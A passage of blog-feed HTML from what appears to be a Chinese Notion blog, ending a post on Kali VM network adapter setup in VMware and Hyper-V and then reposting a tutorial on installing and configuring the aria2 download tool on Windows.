class="notion-text notion-block-7c4f22d3027443f1b5cd2c7335ebbe98">vmware配置</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-67233cba00a342ccbbdfbd2b6a3afb08"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F0cc19c7c-2355-4993-a73d-4f324ba2d58a%2FUntitled.png?table=block&amp;id=67233cba-00a3-42cc-bbdf-bd2b6a3afb08&amp;t=67233cba-00a3-42cc-bbdf-bd2b6a3afb08&amp;width=2541&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-79b1fffe267a44d288db1794f53a0d3e">vmware的虚拟机设置：</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-60de5c1989464c8e92b9e4dafeffd72c"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F94dd8718-c7be-452a-97ae-af939871cdd8%2FUntitled.png?table=block&amp;id=60de5c19-8946-4c8e-92b9-e4dafeffd72c&amp;t=60de5c19-8946-4c8e-92b9-e4dafeffd72c&amp;width=1615&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-b0424f13dd594fbc9c154d98cecdbf63">重启网卡</div><div class="notion-blank notion-block-145ca30a55f741d6b5ae0d90dc58c3df"> </div><div class="notion-text notion-block-030c409e84964b289eda1a3b71292b76"><b>接下来对hyper-v操作</b></div><div class="notion-blank notion-block-eef0496610b54de9ad9aaec0753152a5"> </div><div class="notion-text notion-block-3de09378f30948558ab408ac25cd2755">hyper-v虚拟机配置</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-a2493eff590c42fda58c1577e0e81a8e"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F095f7c4b-4d67-4ef7-8d32-7443a1726ef9%2FUntitled.png?table=block&amp;id=a2493eff-590c-42fd-a58c-1577e0e81a8e&amp;t=a2493eff-590c-42fd-a58c-1577e0e81a8e&amp;width=2485&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-b80b955c3d40411aa45c80deca6d40c8">kali编辑网卡配置（通过hdcp自动获取ip地址）</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-61ee1d239c5149b182798e0757e7d815"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F9a286bd5-dacf-42f6-8a45-a69e29dcf3af%2FUntitled.png?table=block&amp;id=61ee1d23-9c51-49b1-8279-8e0757e7d815&amp;t=61ee1d23-9c51-49b1-8279-8e0757e7d815&amp;width=1505&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-6ff4a3b211d4486699033adeb90dd582">重启网卡：</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-81f44cae1bac4b25af05367c8cf4b23d" data-id="81f44cae1bac4b25af05367c8cf4b23d"><span><div id="81f44cae1bac4b25af05367c8cf4b23d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#81f44cae1bac4b25af05367c8cf4b23d" title="🤗 总结归纳"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">🤗 总结归纳</span></span></h2><div class="notion-text notion-block-2e55869371f147069003e8e8fbb54cd5">以上内容均为原创，转载请标明出处</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-6e6561fae5a043448b4f4024ec3e2c40" data-id="6e6561fae5a043448b4f4024ec3e2c40"><span><div id="6e6561fae5a043448b4f4024ec3e2c40" class="notion-header-anchor"></div><a class="notion-hash-link" href="#6e6561fae5a043448b4f4024ec3e2c40" title="📎 参考文章"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📎 参考文章</span></span></h2><ul class="notion-list notion-list-disc notion-block-07f930c3be4f47a0b01248f3c9d04ad1"><li><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://blog.csdn.net/l1028386804/article/details/84747764">Kali之——设置静态IP_man interfaces 参数_冰 河的博客-CSDN博客</a></li></ul><ul class="notion-list notion-list-disc notion-block-84b99c2dfe024f41a0913e4ea1689faa"><li><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.jianshu.com/p/6657205d844a">VMware Workstation虚拟机双网卡设置 - 简书 (jianshu.com)</a></li></ul><div class="notion-blank notion-block-8abb3551f5894fe4a5fe6f91f555ec4f"> </div><div class="notion-callout notion-gray_background_co notion-block-d412991ccb9741c8a6f7923cfe8afbee"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="💡">💡</span></div><div class="notion-callout-text">欢迎您在底部评论区留言，一起交流~</div></div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[aira2使用分享]]></title>
            <link>https://yuki8888.top/article/87f65074-48a7-4292-8e83-bd6a5d9c40a9</link>
            <guid>https://yuki8888.top/article/87f65074-48a7-4292-8e83-bd6a5d9c40a9</guid>
            <pubDate>Fri, 30 Jun 2023 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-87f6507448a742928e83bd6a5d9c40a9"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><div class="notion-callout notion-gray_background_co notion-block-54d88fa40ab145488fa0487c727b0290"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="😀">😀</span></div><div class="notion-callout-text">听闻<code class="notion-inline-code">@zixv33</code>的安利aria2，前来尝试体验一番</div></div><div class="notion-blank notion-block-e4ed006211f84fb5aa73c985a77d670a"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-e180d321da5a4993bffd340382f9e2e1" data-id="e180d321da5a4993bffd340382f9e2e1"><span><div id="e180d321da5a4993bffd340382f9e2e1" class="notion-header-anchor"></div><a class="notion-hash-link" href="#e180d321da5a4993bffd340382f9e2e1" title="📝 主旨内容"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📝 主旨内容</span></span></h2><div class="notion-text notion-block-f0506b43f98e4e8998e4110333cc89cc">感谢来自大佬<code class="notion-inline-code"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/about/">Chiahong</a></code>的分享</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-05aae9f4d7c048e99d65e73120a23eff" data-id="05aae9f4d7c048e99d65e73120a23eff"><span><div id="05aae9f4d7c048e99d65e73120a23eff" class="notion-header-anchor"></div><a class="notion-hash-link" href="#05aae9f4d7c048e99d65e73120a23eff" title="aira2学习使用"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">aira2学习使用</span></span></h2><div class="notion-text notion-block-8bb069a2d55044128eff467b0ffe3d40">转自：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/">aria2 設定教學 – 強大又輕巧的下載工具，支援 BT、斷點續傳 | Then Notes 隨筆</a></div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-b53f9f47419e45478fc30b93be677a57" data-id="b53f9f47419e45478fc30b93be677a57"><span><div id="b53f9f47419e45478fc30b93be677a57" class="notion-header-anchor"></div><a class="notion-hash-link" href="#b53f9f47419e45478fc30b93be677a57" title="aria2 設定教學 – 強大又輕巧的下載工具，支援 BT、斷點續傳"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>aria2 設定教學 – 強大又輕巧的下載工具，支援 BT、斷點續傳</b>‣</span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-e5e38fcca51e48ca9ad973333b583176"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6aafb856-9ccb-404a-9c75-a342ac9a1188%2FUntitled.png?table=block&amp;id=e5e38fcc-a51e-48ca-9ad9-73333b583176&amp;t=e5e38fcc-a51e-48ca-9ad9-73333b583176&amp;width=1920&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-1f70df0d8cec46d39b6655dcea98e6cb">aria2 是一款強大又輕巧的下載工具，5 MB 不到的大小支援了 HTTP、HTTPS、FTP、SFTP、BitTorrent (BT 種子) 和 Metalink 等通訊協定。aria2 的原理跟 IDM 相似，都是透過分割檔案、增加連線數進行下載，可以提升下載速度。</div><blockquote class="notion-quote notion-block-d328529ca9274704850e6857eb635097"><div>如果您不想動手設定這些有的沒的，其實可以試試看 Motrix 這個開源的下載工具，其核心也是 aria2 哦！但已經全部設定好了，安裝後即可使用。</div><ul class="notion-list notion-list-disc notion-block-7fce2970c0574926990d296ec299ce22"><li>官網: <a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://motrix.app/">https://motrix.app/</a></li></ul><ul class="notion-list notion-list-disc notion-block-6aff544c21cc49dabbafbbc278a85e2d"><li>GitHub: <a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://github.com/agalwood/Motrix">https://github.com/agalwood/Motrix</a></li></ul></blockquote><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-ff1d687e34964003afa3a132902e14e0" data-id="ff1d687e34964003afa3a132902e14e0"><span><div id="ff1d687e34964003afa3a132902e14e0" class="notion-header-anchor"></div><a class="notion-hash-link" href="#ff1d687e34964003afa3a132902e14e0" title="# 功能特色"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E5%8A%9F%E8%83%BD%E7%89%B9%E8%89%B2"><b># </b></a><b>功能特色</b></span></span></h3><ul class="notion-list notion-list-disc notion-block-cb7cbbd277754215a95eed807f822c53"><li>多點下載</li></ul><ul class="notion-list notion-list-disc notion-block-768ba82fa74c4531989abbde6b3de77b"><li>多協定下載</li></ul><ul class="notion-list notion-list-disc notion-block-a095fc43f83a4b459e974e4d12691c15"><li>檔案分割下載</li></ul><ul class="notion-list notion-list-disc notion-block-53af3cdd6de242d681da311d85ab62f3"><li>可使用代理伺服器</li></ul><ul class="notion-list notion-list-disc notion-block-9e3d4b582e6b465bb454ef0b77c54568"><li>可使用 JSON-RPC、XML-RPC 遠端控制</li></ul><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-4210b00277bd4bc3a1a45b7365c0e117" data-id="4210b00277bd4bc3a1a45b7365c0e117"><span><div id="4210b00277bd4bc3a1a45b7365c0e117" class="notion-header-anchor"></div><a class="notion-hash-link" href="#4210b00277bd4bc3a1a45b7365c0e117" title="# 下載"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E4%B8%8B%E8%BC%89"><b># </b></a><b>下載</b></span></span></h3><div class="notion-text notion-block-fb42bf1f29314e0cb6fc77b2c7e3b042">請根據自己的作業系統下載對應的版本，32 位元請選擇 win-32bit，64 位元請選擇 win-64bit。下載連結在 Assets 中，檔名看起來可能像 <code class="notion-inline-code"><b>aria2-1.XX.0-win-XXbit-build1.zip</b></code>。</div><ul class="notion-list notion-list-disc notion-block-c01690341e2a4ed4a07dfe6aae1c2151"><li>前往 <a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://github.com/aria2/aria2/releases/">GitHub</a> 下載</li></ul><ul class="notion-list notion-list-disc notion-block-8c34240ae49f4253a026e61b2c2c5f4e"><li><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://aria2.github.io/">官方網站</a></li></ul><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-34c5249d18924b78b283621229245016" data-id="34c5249d18924b78b283621229245016"><span><div id="34c5249d18924b78b283621229245016" class="notion-header-anchor"></div><a class="notion-hash-link" href="#34c5249d18924b78b283621229245016" title="# 安裝、設定"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E5%AE%89%E8%A3%9D%E8%A8%AD%E5%AE%9A"><b># </b></a><b>安裝、設定</b></span></span></h3><div class="notion-text notion-block-06398dbf64b447dcbca3cf82e9067710">由於 aria2 是非常輕量化的下載工具，所以並沒有 GUI 介面（別擔心，有人寫出 Web 介面，後面會講到！），需要自行建立設定檔。</div><div class="notion-text notion-block-1bddc664eebe4ba5893460990ebbe005">首先解壓縮 aria2 至硬碟中的任何地方，例如 <code class="notion-inline-code"><b>C:\aria2</b></code>，在資料夾中依序建立 5 個檔案 <code class="notion-inline-code"><b>aria2.conf</b></code>、<code class="notion-inline-code"><b>aria2.session</b></code>、<code class="notion-inline-code"><b>Start.vbs</b></code>、<code class="notion-inline-code"><b>Status.bat</b></code>、<code class="notion-inline-code"><b>Stop.bat</b></code>、<code class="notion-inline-code"><b>Restart.bat</b></code>。</div><div class="notion-text notion-block-d6edcd28a6954500b8a2605747ba1b5f">建議您不要使用「記事本」建立這些檔案，可能會因為編碼問題造成錯誤。可以使用 Visual Studio Code 或 Notepad++ 等軟體編輯，編碼請選擇 UTF-8，且副檔名一定要正確，注意不要存成 .txt 純文字檔哦！</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-5050e26a7ad941abb35a420736c0b4e0"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F5b7ec24c-800c-4e23-b779-cbdb41ae1279%2FUntitled.png?table=block&amp;id=5050e26a-7ad9-41ab-b35a-420736c0b4e0&amp;t=5050e26a-7ad9-41ab-b35a-420736c0b4e0&amp;width=1920&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-cf77ac0c78ce489a9af95c2957a2820b" data-id="cf77ac0c78ce489a9af95c2957a2820b"><span><div id="cf77ac0c78ce489a9af95c2957a2820b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#cf77ac0c78ce489a9af95c2957a2820b" title="# 手動建立 aria2.conf 檔案"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E6%89%8B%E5%8B%95%E5%BB%BA%E7%AB%8B-aria2conf-%E6%AA%94%E6%A1%88"><b># </b></a><b>手動建立 </b><code class="notion-inline-code"><b>aria2.conf</b></code><b> 檔案</b></span></span></h4><div class="notion-text notion-block-145050e6bd8e4a50a4fb6e288c56ee5c">用文字編輯軟體貼上以下設定，可以自行調整功能。</div><blockquote class="notion-quote notion-block-c42d1e3b9a3f40bb9d3a9745ab5b9ff8"><div>2020/06/30 更新，新增額外的 Tracker，有沒有效果筆者不敢保證</div></blockquote><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-4f2b0ce7388e47258084f6df653f747b" data-id="4f2b0ce7388e47258084f6df653f747b"><span><div id="4f2b0ce7388e47258084f6df653f747b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#4f2b0ce7388e47258084f6df653f747b" title="# 手動建立 aria2.session 檔案（Session 儲存位置）"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E6%89%8B%E5%8B%95%E5%BB%BA%E7%AB%8B-aria2session-%E6%AA%94%E6%A1%88session-%E5%84%B2%E5%AD%98%E4%BD%8D%E7%BD%AE"><b># </b></a><b>手動建立 </b><code class="notion-inline-code"><b>aria2.session</b></code><b> 檔案（Session 儲存位置）</b></span></span></h4><div class="notion-text notion-block-46fbf871dfdf4f04a1679c03a250a306">空白檔案，不用填入任何東西。沒錯，不用懷疑，存檔完就可以關掉了！</div><blockquote class="notion-quote notion-block-c2bf3018b9664e9aa1693f1dcd73d104"><div>注意！aria2.session 雖然是空白檔案，但一定要建立，否則會打不開 aria2</div></blockquote><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-8309e47884ec4ad1bed7148a34b6ab40" data-id="8309e47884ec4ad1bed7148a34b6ab40"><span><div id="8309e47884ec4ad1bed7148a34b6ab40" class="notion-header-anchor"></div><a class="notion-hash-link" href="#8309e47884ec4ad1bed7148a34b6ab40" title="# 手動建立 Start.vbs 檔案（讓 aria2 背景執行）"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E6%89%8B%E5%8B%95%E5%BB%BA%E7%AB%8B-startvbs-%E6%AA%94%E6%A1%88%E8%AE%93-aria2-%E8%83%8C%E6%99%AF%E5%9F%B7%E8%A1%8C"><b># </b></a><b>手動建立 </b><code class="notion-inline-code"><b>Start.vbs</b></code><b> 檔案（讓 aria2 背景執行）</b></span></span></h4><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-5055274481ea490cba3b85366b2a4e5d" data-id="5055274481ea490cba3b85366b2a4e5d"><span><div id="5055274481ea490cba3b85366b2a4e5d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#5055274481ea490cba3b85366b2a4e5d" title="# 手動建立 Status.bat 檔案（顯示 aria2 狀態）"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E6%89%8B%E5%8B%95%E5%BB%BA%E7%AB%8B-statusbat-%E6%AA%94%E6%A1%88%E9%A1%AF%E7%A4%BA-aria2-%E7%8B%80%E6%85%8B"><b># </b></a><b>手動建立 </b><code class="notion-inline-code"><b>Status.bat</b></code><b> 檔案（顯示 aria2 狀態）</b></span></span></h4><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-dfa06ea41c394ff8b6a428a3daf8e11d" data-id="dfa06ea41c394ff8b6a428a3daf8e11d"><span><div id="dfa06ea41c394ff8b6a428a3daf8e11d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#dfa06ea41c394ff8b6a428a3daf8e11d" title="# 手動建立 Stop.bat 檔案（關閉 aria2）"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E6%89%8B%E5%8B%95%E5%BB%BA%E7%AB%8B-stopbat-%E6%AA%94%E6%A1%88%E9%97%9C%E9%96%89-aria2"><b># </b></a><b>手動建立 </b><code class="notion-inline-code"><b>Stop.bat</b></code><b> 檔案（關閉 aria2）</b></span></span></h4><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-8dde1efd4d7549d082098b6fe045029e" data-id="8dde1efd4d7549d082098b6fe045029e"><span><div id="8dde1efd4d7549d082098b6fe045029e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#8dde1efd4d7549d082098b6fe045029e" title="# 手動建立 Restart.bat 檔案（重啟 aria2）"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://then.tw/aria2/#%E6%89%8B%E5%8B%95%E5%BB%BA%E7%AB%8B-restartbat-%E6%AA%94%E6%A1%88%E9%87%8D%E5%95%9F-aria2"><b># </b></a><b>手動建立 </b><code class="notion-inline-code"><b>Restart.bat</b></code><b> 檔案（重啟 aria2）</b></span></span></h4><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1815c2221e734b8a802199155cb756df" data-id="1815c2221e734b8a802199155cb756df"><span><div id="1815c2221e734b8a802199155cb756df" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1815c2221e734b8a802199155cb756df" title="# 執行 aria2"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><a target="_blank" rel="noopener noreferrer" class="notion-link" 